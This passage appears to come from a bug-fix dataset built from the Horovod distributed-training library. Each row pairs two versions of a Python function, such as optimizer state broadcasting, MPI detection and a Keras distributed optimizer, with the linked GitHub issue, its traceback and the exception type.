key = "%s.%d" % (option_key, index)
dtypes = _get_types(option_value)
option_tensor = torch.Tensor([option_value])
callbacks[key] = _create_option_callback(
index, option_key, option_tensor, dtypes
)
params.append((key, option_tensor))
# The params list here is ordered by the layers in the model
for pid in group["params"]:
param_state = state_dict["state"][pid]
for name, p in param_state.items():
# Some parameter names may appear more than once, in which
# case we ensure they have a unique identifier defined by
# their order
occurrences[name] += 1
key = "%s.%d" % (str(name), occurrences[name])
if not torch.is_tensor(p):
# Wrap the scalar in a FloatTensor, and remember its type
# so we can cast it back after unwrapping
t = type(p)
p = torch.Tensor([p])
callbacks[key] = _create_callback(pid, name, t, p)
params.append((key, p))
# Synchronized broadcast of all parameters
broadcast_parameters(params, root_rank)
# Post-broadcast cleanup for non-tensor parameters
for key, p in params:
if key in callbacks:
callbacks[key]()
|
https://github.com/horovod/horovod/issues/1725
|
Traceback (most recent call last):
...
File ************
HVD.broadcast_optimizer_state(optimizer, root_rank=0)
File "/usr/local/lib/python3.7/dist-packages/horovod/torch/__init__.py", line 572, in broadcast_optimizer_state
param_state = state_dict['state'][pid]
KeyError: 140137585983888
|
KeyError
|
def _get_mpi_implementation_flags():
output = six.StringIO()
command = "mpirun --version"
try:
exit_code = safe_shell_exec.execute(command, stdout=output, stderr=output)
output_msg = output.getvalue()
except Exception:
print(traceback.format_exc(), file=sys.stderr)
return None
finally:
output.close()
if exit_code == 0:
if "Open MPI" in output_msg or "OpenRTE" in output_msg:
return list(_OMPI_FLAGS)
elif "IBM Spectrum MPI" in output_msg:
return list(_SMPI_FLAGS)
elif "MPICH" in output_msg:
return list(_MPICH_FLAGS)
print(
"Open MPI/Spectrum MPI/MPICH not found in output of mpirun --version.",
file=sys.stderr,
)
return None
else:
print("Was not able to run %s:\n%s" % (command, output_msg), file=sys.stderr)
return None
|
def _get_mpi_implementation_flags():
output = six.StringIO()
command = "mpirun --version"
try:
exit_code = safe_shell_exec.execute(command, stdout=output, stderr=output)
output_msg = output.getvalue()
except Exception:
print(traceback.format_exc(), file=sys.stderr)
return None
finally:
output.close()
if exit_code == 0:
if "Open MPI" in output_msg:
return list(_OMPI_FLAGS)
elif "IBM Spectrum MPI" in output_msg:
return list(_SMPI_FLAGS)
elif "MPICH" in output_msg:
return list(_MPICH_FLAGS)
print(
"Open MPI/Spectrum MPI/MPICH not found in output of mpirun --version.",
file=sys.stderr,
)
return None
else:
print("Was not able to run %s:\n%s" % (command, output_msg), file=sys.stderr)
return None
|
https://github.com/horovod/horovod/issues/1690
|
horovodrun -np 1 -H localhost:1 python pytorch_mnist.py
Open MPI not found in output of mpirun --version.
Traceback (most recent call last):
File "/opt/conda/bin/horovodrun", line 21, in <module>
run.run()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/run.py", line 448, in run
'horovodrun convenience script currently only supports '
Exception: horovodrun convenience script currently only supports Open MPI.
Choose one of:
1. Install Open MPI 4.0.0+ and re-install Horovod (use --no-cache-dir pip option).
2. Run distributed training script using the standard way provided by your MPI distribution (usually mpirun, srun, or jsrun).
root@3da487b92c3d:/horovod/examples# mpirun --version
mpirun.real (OpenRTE) 4.0.1
Report bugs to http://www.open-mpi.org/community/help/
|
Exception
|
def broadcast_optimizer_state(optimizer, root_rank):
"""
Broadcasts an optimizer state from root rank to all other processes.
Arguments:
optimizer: An optimizer.
root_rank: The rank of the process from which the optimizer will be
broadcasted to all other processes.
"""
if isinstance(optimizer, torch.optim.LBFGS):
# TODO(travis): L-BFGS cannot be easily supported without serializing
# the entire state_dict, as its structure is deeply nested and contains
# None type parameter values
raise ValueError("cannot broadcast torch.optim.LBFGS state")
state_dict = optimizer.state_dict()
# Newly created optimizers will not have their state initialized, so
# do that initialization here
if len(state_dict["state"]) == 0:
for group in optimizer.param_groups:
for p in group["params"]:
if p.requires_grad and id(p) not in state_dict["state"]:
p.grad = p.data.new(p.size()).zero_()
# This function accepts a torch.optim.Optimizer or a DistributedOptimizer
# wrapped around a torch optimizer. Calling step() with a DistributedOptimizer
# forces allreduce on all model parameters, which will result in deadlock
# unless every rank calls step(). Therefore, to finish state initialization
# only call optimizer.step() with a torch.optim.Optimizer.
if optimizer.__module__ == DistributedOptimizer.__module__:
super(optimizer.__class__, optimizer).step()
else:
optimizer.step()
state_dict = optimizer.state_dict()
# If the state_dict is still empty after initialization, then
# the optimizer is stateless, and there is nothing to broadcast.
# Furthermore, attempting to access the state dict would result in
# an error.
if len(state_dict["state"]) == 0:
return
params = []
callbacks = {}
occurrences = collections.defaultdict(int)
# Returns the full type structure of the possibly nested objects for recursive casting back
def _get_types(x):
if isinstance(x, collections.Iterable):
return type(x), [_get_types(xi) for xi in x]
else:
return type(x)
# Casts an object encoded in a tensor back into its original type and subtypes
def _recursive_cast(x, dtype):
if isinstance(dtype, tuple):
t, dtypes = dtype
x = t(x)
return t([_recursive_cast(x[i], dtypes[i]) for i in range(len(x))])
else:
return dtype(x)
# Some optimizer parameters may be represented as scalars instead of
# tensors. In such cases, we need to wrap the scalar in a tensor, then
# broadcast, then update the appropriate value in the state_dict with the
# new unwrapped scalar value via a callback.
def _create_callback(pid, name, t, p):
def _from_tensor():
state_dict["state"][pid][name] = t(p.cpu().numpy()[0])
return _from_tensor
def _create_option_callback(index, option_key, option_tensor, dtypes):
def _from_tensor():
optimizer.param_groups[index][option_key] = _recursive_cast(
option_tensor.cpu().numpy()[0], dtypes
)
return _from_tensor
# Param groups are an ordered list, normally there is only one per model,
# but users can add additional param groups for example to train
# previously frozen layers
for index, group in enumerate(state_dict["param_groups"]):
# Broadcast options like learning rate
for option_key, option_value in group.items():
if option_key == "params":
continue
# Options like the learning rate are scalar, and need to be wrapped in tensors
key = "%s.%d" % (option_key, index)
dtypes = _get_types(option_value)
option_tensor = torch.Tensor([option_value])
callbacks[key] = _create_option_callback(
index, option_key, option_tensor, dtypes
)
params.append((key, option_tensor))
# The params list here is ordered by the layers in the model
for pid in group["params"]:
param_state = state_dict["state"][pid]
for name, p in param_state.items():
# Some parameter names may appear more than once, in which
# case we ensure they have a unique identifier defined by
# their order
occurrences[name] += 1
key = "%s.%d" % (str(name), occurrences[name])
if not torch.is_tensor(p):
# Wrap the scalar in a FloatTensor, and remember its type
# so we can cast it back after unwrapping
t = type(p)
p = torch.Tensor([p])
callbacks[key] = _create_callback(pid, name, t, p)
params.append((key, p))
# Synchronized broadcast of all parameters
broadcast_parameters(params, root_rank)
# Post-broadcast cleanup for non-tensor parameters
for key, p in params:
if key in callbacks:
callbacks[key]()
|
def broadcast_optimizer_state(optimizer, root_rank):
"""
Broadcasts an optimizer state from root rank to all other processes.
Arguments:
optimizer: An optimizer.
root_rank: The rank of the process from which the optimizer will be
broadcasted to all other processes.
"""
if isinstance(optimizer, torch.optim.LBFGS):
# TODO(travis): L-BFGS cannot be easily supported without serializing
# the entire state_dict, as its structure is deeply nested and contains
# None type parameter values
raise ValueError("cannot broadcast torch.optim.LBFGS state")
state_dict = optimizer.state_dict()
# Newly created optimizers will not have their state initialized, so
# do that initialization here
if len(state_dict["state"]) == 0:
for group in optimizer.param_groups:
for p in group["params"]:
p.grad = p.data.new(p.size()).zero_()
# This function accepts a torch.optim.Optimizer or a DistributedOptimizer
# wrapped around a torch optimizer. Calling step() with a DistributedOptimizer
# forces allreduce on all model parameters, which will result in deadlock
# unless every rank calls step(). Therefore, to finish state initialization
# only call optimizer.step() with a torch.optim.Optimizer.
if optimizer.__module__ == DistributedOptimizer.__module__:
super(optimizer.__class__, optimizer).step()
else:
optimizer.step()
state_dict = optimizer.state_dict()
# If the state_dict is still empty after initialization, then
# the optimizer is stateless, and there is nothing to broadcast.
# Furthermore, attempting to access the state dict would result in
# an error.
if len(state_dict["state"]) == 0:
return
params = []
callbacks = {}
occurrences = collections.defaultdict(int)
# Returns the full type structure of the possibly nested objects for recursive casting back
def _get_types(x):
if isinstance(x, collections.Iterable):
return type(x), [_get_types(xi) for xi in x]
else:
return type(x)
# Casts an object encoded in a tensor back into its original type and subtypes
def _recursive_cast(x, dtype):
if isinstance(dtype, tuple):
t, dtypes = dtype
x = t(x)
return t([_recursive_cast(x[i], dtypes[i]) for i in range(len(x))])
else:
return dtype(x)
# Some optimizer parameters may be represented as scalars instead of
# tensors. In such cases, we need to wrap the scalar in a tensor, then
# broadcast, then update the appropriate value in the state_dict with the
# new unwrapped scalar value via a callback.
def _create_callback(pid, name, t, p):
def _from_tensor():
state_dict["state"][pid][name] = t(p.cpu().numpy()[0])
return _from_tensor
def _create_option_callback(index, option_key, option_tensor, dtypes):
def _from_tensor():
optimizer.param_groups[index][option_key] = _recursive_cast(
option_tensor.cpu().numpy()[0], dtypes
)
return _from_tensor
# Param groups are an ordered list, normally there is only one per model,
# but users can add additional param groups for example to train
# previously frozen layers
for index, group in enumerate(state_dict["param_groups"]):
# Broadcast options like learning rate
for option_key, option_value in group.items():
if option_key == "params":
continue
# Options like the learning rate are scalar, and need to be wrapped in tensors
key = "%s.%d" % (option_key, index)
dtypes = _get_types(option_value)
option_tensor = torch.Tensor([option_value])
callbacks[key] = _create_option_callback(
index, option_key, option_tensor, dtypes
)
params.append((key, option_tensor))
# The params list here is ordered by the layers in the model
for pid in group["params"]:
param_state = state_dict["state"][pid]
for name, p in param_state.items():
# Some parameter names may appear more than once, in which
# case we ensure they have a unique identifier defined by
# their order
occurrences[name] += 1
key = "%s.%d" % (str(name), occurrences[name])
if not torch.is_tensor(p):
# Wrap the scalar in a FloatTensor, and remember its type
# so we can cast it back after unwrapping
t = type(p)
p = torch.Tensor([p])
callbacks[key] = _create_callback(pid, name, t, p)
params.append((key, p))
# Synchronized broadcast of all parameters
broadcast_parameters(params, root_rank)
# Post-broadcast clenaup for non-tensor parameters
for key, p in params:
if key in callbacks:
callbacks[key]()
|
https://github.com/horovod/horovod/issues/1608
|
Traceback (most recent call last):
File "/.../mwe.py", line 30, in <module>
hvd.broadcast_optimizer_state(optimizer, root_rank=0)
File "/.../python2.7/dist-packages/horovod-0.16.1-py2.7-linux-x86_64.egg/horovod/torch/__init__.py", line 261, in broadcast_optimizer_state
super(optimizer.__class__, optimizer).step()
File "/.../torch/optim/sgd.py", line 106, in step
p.data.add_(-group['lr'], d_p)
RuntimeError: For integral input tensors, argument alpha must not be a floating point number.
|
RuntimeError
|
def create_distributed_optimizer(
keras, optimizer, name, device_dense, device_sparse, compression, sparse_as_dense
):
class _DistributedOptimizer(keras.optimizers.Optimizer):
def __init__(self, **kwargs):
self._name = name or "Distributed%s" % self.__class__.__base__.__name__
self._device_dense = device_dense
self._device_sparse = device_sparse
self._compression = compression
self._sparse_as_dense = sparse_as_dense
self._get_gradients_used = False
super(self.__class__, self).__init__(**kwargs)
def get_gradients(self, loss, params):
"""
Compute gradients of all trainable variables.
See Optimizer.get_gradients() for more info.
In DistributedOptimizer, get_gradients() is overriden to also
allreduce the gradients before returning them.
"""
self._get_gradients_used = True
gradients = super(self.__class__, self).get_gradients(loss, params)
if hvd.size() > 1:
averaged_gradients = []
with tf.name_scope(self._name + "_Allreduce"):
for grad in gradients:
if grad is not None:
if self._sparse_as_dense and isinstance(
grad, tf.IndexedSlices
):
grad = tf.convert_to_tensor(grad)
avg_grad = hvd.allreduce(
grad,
device_dense=self._device_dense,
device_sparse=self._device_sparse,
compression=self._compression,
)
averaged_gradients.append(avg_grad)
else:
averaged_gradients.append(None)
return averaged_gradients
else:
return gradients
def apply_gradients(self, *args, **kwargs):
if not self._get_gradients_used:
raise Exception(
"`apply_gradients()` was called without a call to "
"`get_gradients()`. If you're using TensorFlow 2.0, "
"please specify `experimental_run_tf_function=False` in "
"`compile()`."
)
return super(self.__class__, self).apply_gradients(*args, **kwargs)
# We dynamically create a new class that inherits from the optimizer that was passed in.
# The goal is to override get_gradients() method with an allreduce implementation.
# This class will have the same name as the optimizer it's wrapping, so that the saved
# model could be easily restored without Horovod.
cls = type(
optimizer.__class__.__name__,
(optimizer.__class__,),
dict(_DistributedOptimizer.__dict__),
)
return cls.from_config(optimizer.get_config())
|
def create_distributed_optimizer(
keras, optimizer, name, device_dense, device_sparse, compression, sparse_as_dense
):
class _DistributedOptimizer(keras.optimizers.Optimizer):
def __init__(
self,
name,
device_dense,
device_sparse,
compression,
sparse_as_dense,
config,
):
if name is None:
name = "Distributed%s" % self.__class__.__base__.__name__
self._name = name
self._device_dense = device_dense
self._device_sparse = device_sparse
self._compression = compression
self._sparse_as_dense = sparse_as_dense
self._get_gradients_used = False
super(self.__class__, self).__init__(**config)
def get_gradients(self, loss, params):
"""
Compute gradients of all trainable variables.
See Optimizer.get_gradients() for more info.
In DistributedOptimizer, get_gradients() is overriden to also
allreduce the gradients before returning them.
"""
self._get_gradients_used = True
gradients = super(self.__class__, self).get_gradients(loss, params)
if hvd.size() > 1:
averaged_gradients = []
with tf.name_scope(self._name + "_Allreduce"):
for grad in gradients:
if grad is not None:
if self._sparse_as_dense and isinstance(
grad, tf.IndexedSlices
):
grad = tf.convert_to_tensor(grad)
avg_grad = hvd.allreduce(
grad,
device_dense=self._device_dense,
device_sparse=self._device_sparse,
compression=self._compression,
)
averaged_gradients.append(avg_grad)
else:
averaged_gradients.append(None)
return averaged_gradients
else:
return gradients
def apply_gradients(self, *args, **kwargs):
if not self._get_gradients_used:
raise Exception(
"`apply_gradients()` was called without a call to "
"`get_gradients()`. If you're using TensorFlow 2.0, "
"please specify `experimental_run_tf_function=False` in "
"`compile()`."
)
return super(self.__class__, self).apply_gradients(*args, **kwargs)
@classmethod
def from_config(cls, cfg):
return cls(
name, device_dense, device_sparse, compression, sparse_as_dense, cfg
)
# We dynamically create a new class that inherits from the optimizer that was passed in.
# The goal is to override get_gradients() method with an allreduce implementation.
# This class will have the same name as the optimizer it's wrapping, so that the saved
# model could be easily restored without Horovod.
cls = type(
optimizer.__class__.__name__,
(optimizer.__class__,),
dict(_DistributedOptimizer.__dict__),
)
return cls(
name,
device_dense,
device_sparse,
compression,
sparse_as_dense,
optimizer.get_config(),
)
|
https://github.com/horovod/horovod/issues/1573
|
[1,0]<stderr>:Traceback (most recent call last):
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 541, in __getattribute__
[1,0]<stderr>: return super(OptimizerV2, self).__getattribute__(name)
[1,0]<stderr>:AttributeError: 'Adam' object has no attribute 'lr'
[1,0]<stderr>:
[1,0]<stderr>:During handling of the above exception, another exception occurred:
[1,0]<stderr>:
[1,0]<stderr>:Traceback (most recent call last):
[1,0]<stderr>: File "tensorflow_keras_mnist.py", line 94, in <module>
[1,0]<stderr>: mnist_model.fit(dataset, steps_per_epoch=500 // hvd.size(), callbacks=callbacks, epochs=24, verbose=verbose)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/engine/training.py", line 728, in fit
[1,0]<stderr>: use_multiprocessing=use_multiprocessing)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/engine/training_generator.py", line 693, in fit
[1,0]<stderr>: steps_name='steps_per_epoch')
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/engine/training_generator.py", line 196, in model_iteration
[1,0]<stderr>: callbacks._call_begin_hook(mode)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/callbacks.py", line 249, in _call_begin_hook
[1,0]<stderr>: self.on_train_begin()
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/callbacks.py", line 365, in on_train_begin
[1,0]<stderr>: callback.on_train_begin(logs)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/horovod/_keras/callbacks.py", line 137, in on_train_begin
[1,0]<stderr>: self.initial_lr = self.backend.get_value(self.model.optimizer.lr)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 550, in __getattribute__
[1,0]<stderr>: return self._get_hyper(name)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 527, in _get_hyper
[1,0]<stderr>: self._create_hypers()
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 643, in _create_hypers
[1,0]<stderr>: aggregation=tf_variables.VariableAggregation.ONLY_FIRST_REPLICA)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 805, in add_weight
[1,0]<stderr>: aggregation=aggregation)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/training/tracking/base.py", line 744, in _add_variable_with_custom_getter
[1,0]<stderr>: **kwargs_for_getter)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/engine/base_layer_utils.py", line 139, in make_variable
[1,0]<stderr>: shape=variable_shape if variable_shape else None)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variables.py", line 258, in __call__
[1,0]<stderr>: return cls._variable_v1_call(*args, **kwargs)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variables.py", line 219, in _variable_v1_call
[1,0]<stderr>: shape=shape)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variables.py", line 197, in <lambda>
[1,0]<stderr>: previous_getter = lambda **kwargs: default_variable_creator(None, **kwargs)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variable_scope.py", line 2507, in default_variable_creator
[1,0]<stderr>: shape=shape)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variables.py", line 262, in __call__
[1,0]<stderr>: return super(VariableMetaclass, cls).__call__(*args, **kwargs)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/resource_variable_ops.py", line 1406, in __init__
[1,0]<stderr>: distribute_strategy=distribute_strategy)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/resourc[1,0]<stderr>:e_variable_ops.py", line 1538, in _init_from_args
[1,0]<stderr>: name="initial_value", dtype=dtype)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/ops.py", line 1184, in convert_to_tensor
[1,0]<stderr>: return convert_to_tensor_v2(value, dtype, preferred_dtype, name)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/ops.py", line 1242, in convert_to_tensor_v2
[1,0]<stderr>: as_ref=False)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/ops.py", line 1296, in internal_convert_to_tensor
[1,0]<stderr>: ret = conversion_func(value, dtype=dtype, name=name, as_ref=as_ref)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/constant_op.py", line 286, in _constant_tensor_conversion_function
[1,0]<stderr>: return constant(v, dtype=dtype, name=name)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/constant_op.py", line 227, in constant
[1,0]<stderr>: allow_broadcast=True)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/constant_op.py", line 235, in _constant_impl
[1,0]<stderr>: t = convert_to_eager_tensor(value, ctx, dtype)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/constant_op.py", line 96, in convert_to_eager_tensor
[1,0]<stderr>: return ops.EagerTensor(value, ctx.device_name, dtype)
[1,0]<stderr>:ValueError: Attempt to convert a value ({'class_name': 'ExponentialDecay', 'config': {'initial_learning_rate': 0.001, 'decay_steps': 100000, 'decay_rate': 0.96, 'staircase': True, 'name': None}}) with an unsupported type (<class 'dict'>) to a Tensor.
[1,0]<stderr>:Exception ignored in: <function _RandomSeedGeneratorDeleter.__del__ at 0x7f7dec944a70>
[1,0]<stderr>:Traceback (most recent call last):
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/data/ops/dataset_ops.py", line 3009, in __del__
[1,0]<stderr>:AttributeError: 'NoneType' object has no attribute 'device'
--------------------------------------------------------------------------
Primary job terminated normally, but 1 process returned
a non-zero exit code. Per user-direction, the job has been aborted.
--------------------------------------------------------------------------
|
AttributeError
|
def __init__(self, **kwargs):
self._name = name or "Distributed%s" % self.__class__.__base__.__name__
self._device_dense = device_dense
self._device_sparse = device_sparse
self._compression = compression
self._sparse_as_dense = sparse_as_dense
self._get_gradients_used = False
super(self.__class__, self).__init__(**kwargs)
|
def __init__(
self, name, device_dense, device_sparse, compression, sparse_as_dense, config
):
if name is None:
name = "Distributed%s" % self.__class__.__base__.__name__
self._name = name
self._device_dense = device_dense
self._device_sparse = device_sparse
self._compression = compression
self._sparse_as_dense = sparse_as_dense
self._get_gradients_used = False
super(self.__class__, self).__init__(**config)
|
https://github.com/horovod/horovod/issues/1573
|
[1,0]<stderr>:Traceback (most recent call last):
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 541, in __getattribute__
[1,0]<stderr>: return super(OptimizerV2, self).__getattribute__(name)
[1,0]<stderr>:AttributeError: 'Adam' object has no attribute 'lr'
[1,0]<stderr>:
[1,0]<stderr>:During handling of the above exception, another exception occurred:
[1,0]<stderr>:
[1,0]<stderr>:Traceback (most recent call last):
[1,0]<stderr>: File "tensorflow_keras_mnist.py", line 94, in <module>
[1,0]<stderr>: mnist_model.fit(dataset, steps_per_epoch=500 // hvd.size(), callbacks=callbacks, epochs=24, verbose=verbose)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/engine/training.py", line 728, in fit
[1,0]<stderr>: use_multiprocessing=use_multiprocessing)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/engine/training_generator.py", line 693, in fit
[1,0]<stderr>: steps_name='steps_per_epoch')
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/engine/training_generator.py", line 196, in model_iteration
[1,0]<stderr>: callbacks._call_begin_hook(mode)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/callbacks.py", line 249, in _call_begin_hook
[1,0]<stderr>: self.on_train_begin()
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/callbacks.py", line 365, in on_train_begin
[1,0]<stderr>: callback.on_train_begin(logs)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/horovod/_keras/callbacks.py", line 137, in on_train_begin
[1,0]<stderr>: self.initial_lr = self.backend.get_value(self.model.optimizer.lr)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 550, in __getattribute__
[1,0]<stderr>: return self._get_hyper(name)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 527, in _get_hyper
[1,0]<stderr>: self._create_hypers()
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 643, in _create_hypers
[1,0]<stderr>: aggregation=tf_variables.VariableAggregation.ONLY_FIRST_REPLICA)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/optimizer_v2/optimizer_v2.py", line 805, in add_weight
[1,0]<stderr>: aggregation=aggregation)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/training/tracking/base.py", line 744, in _add_variable_with_custom_getter
[1,0]<stderr>: **kwargs_for_getter)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/keras/engine/base_layer_utils.py", line 139, in make_variable
[1,0]<stderr>: shape=variable_shape if variable_shape else None)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variables.py", line 258, in __call__
[1,0]<stderr>: return cls._variable_v1_call(*args, **kwargs)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variables.py", line 219, in _variable_v1_call
[1,0]<stderr>: shape=shape)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variables.py", line 197, in <lambda>
[1,0]<stderr>: previous_getter = lambda **kwargs: default_variable_creator(None, **kwargs)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variable_scope.py", line 2507, in default_variable_creator
[1,0]<stderr>: shape=shape)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/variables.py", line 262, in __call__
[1,0]<stderr>: return super(VariableMetaclass, cls).__call__(*args, **kwargs)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/resource_variable_ops.py", line 1406, in __init__
[1,0]<stderr>: distribute_strategy=distribute_strategy)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/ops/resourc[1,0]<stderr>:e_variable_ops.py", line 1538, in _init_from_args
[1,0]<stderr>: name="initial_value", dtype=dtype)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/ops.py", line 1184, in convert_to_tensor
[1,0]<stderr>: return convert_to_tensor_v2(value, dtype, preferred_dtype, name)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/ops.py", line 1242, in convert_to_tensor_v2
[1,0]<stderr>: as_ref=False)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/ops.py", line 1296, in internal_convert_to_tensor
[1,0]<stderr>: ret = conversion_func(value, dtype=dtype, name=name, as_ref=as_ref)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/constant_op.py", line 286, in _constant_tensor_conversion_function
[1,0]<stderr>: return constant(v, dtype=dtype, name=name)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/constant_op.py", line 227, in constant
[1,0]<stderr>: allow_broadcast=True)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/constant_op.py", line 235, in _constant_impl
[1,0]<stderr>: t = convert_to_eager_tensor(value, ctx, dtype)
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/framework/constant_op.py", line 96, in convert_to_eager_tensor
[1,0]<stderr>: return ops.EagerTensor(value, ctx.device_name, dtype)
[1,0]<stderr>:ValueError: Attempt to convert a value ({'class_name': 'ExponentialDecay', 'config': {'initial_learning_rate': 0.001, 'decay_steps': 100000, 'decay_rate': 0.96, 'staircase': True, 'name': None}}) with an unsupported type (<class 'dict'>) to a Tensor.
[1,0]<stderr>:Exception ignored in: <function _RandomSeedGeneratorDeleter.__del__ at 0x7f7dec944a70>
[1,0]<stderr>:Traceback (most recent call last):
[1,0]<stderr>: File "/home/pstjohn/miniconda3/envs/tf2/lib/python3.7/site-packages/tensorflow_core/python/data/ops/dataset_ops.py", line 3009, in __del__
[1,0]<stderr>:AttributeError: 'NoneType' object has no attribute 'device'
--------------------------------------------------------------------------
Primary job terminated normally, but 1 process returned
a non-zero exit code. Per user-direction, the job has been aborted.
--------------------------------------------------------------------------
|
AttributeError
|
def allreduce(
tensor,
average=None,
device_dense="",
device_sparse="",
compression=Compression.none,
op=None,
):
"""Perform an allreduce on a tf.Tensor or tf.IndexedSlices.
This function performs a bandwidth-optimal ring allreduce on the input
tensor. If the input is an tf.IndexedSlices, the function instead does an
allgather on the values and the indices, effectively doing an allreduce on
the represented tensor.
Arguments:
tensor: tf.Tensor, tf.Variable, or tf.IndexedSlices to reduce.
The shape of the input must be identical across all ranks.
